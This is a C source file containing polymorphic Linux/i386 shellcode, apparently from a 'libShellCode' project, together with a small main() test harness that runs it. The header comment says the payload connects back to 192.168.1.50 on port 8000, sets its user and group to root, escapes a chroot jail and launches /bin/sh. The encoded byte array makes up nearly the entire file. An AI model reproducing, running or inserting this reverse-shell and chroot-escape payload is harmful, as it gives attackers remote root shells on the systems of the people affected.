/*
 *     __   ___   _
 *    /  \ |   \ | | /\--------<ShellCode generated with libShellCode>--------->
 *   / /\ \| |\ \| |/ /      
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 * 
 * 
 * This is a Linux/i386 polymorphic ShellCode that opens a connection to 
 * 192.168.1.50:8000 and exec a setuid(0) and a setgid(0), then evade from 
 * chroot and executes /bin/sh and exit(0).
 *
 */

char shellcode[]=
"\xeb\x13\x5e\x31\xc9\xb0\x89\xf3\xb1\xa0\x01\xce\xb1\xa7\x30\x03"
"\x43\xe2\xfb\xeb\x05\xe8\xe8\xff\xff\xff\x31\xdb\xf7\xe3\xb0\x66"
"\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x31\xc9\x66\xb9"
"\x1f\x40\x68\xc0\xa8\x01\x32\x66\x51\x43\x66\x53\x89\xe1\xb0\x10"
"\x50\x51\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xfb\x89\xd9\xb0\x3f"
"\x49\xcd\x80\x41\xe2\xf8\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x2e\xcd\x80\x31\xc0\x53\x68\x6a\x61\x69\x6c\x89\xe3"
"\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x31\xc9"
"\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80"
"\x31\xc0\x31\xdb\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\x2f\x62\x69\x6e\x2f\x73"
"\x68";

main()
{
  void (*f)();
  (char *)f = shellcode;
  f();
}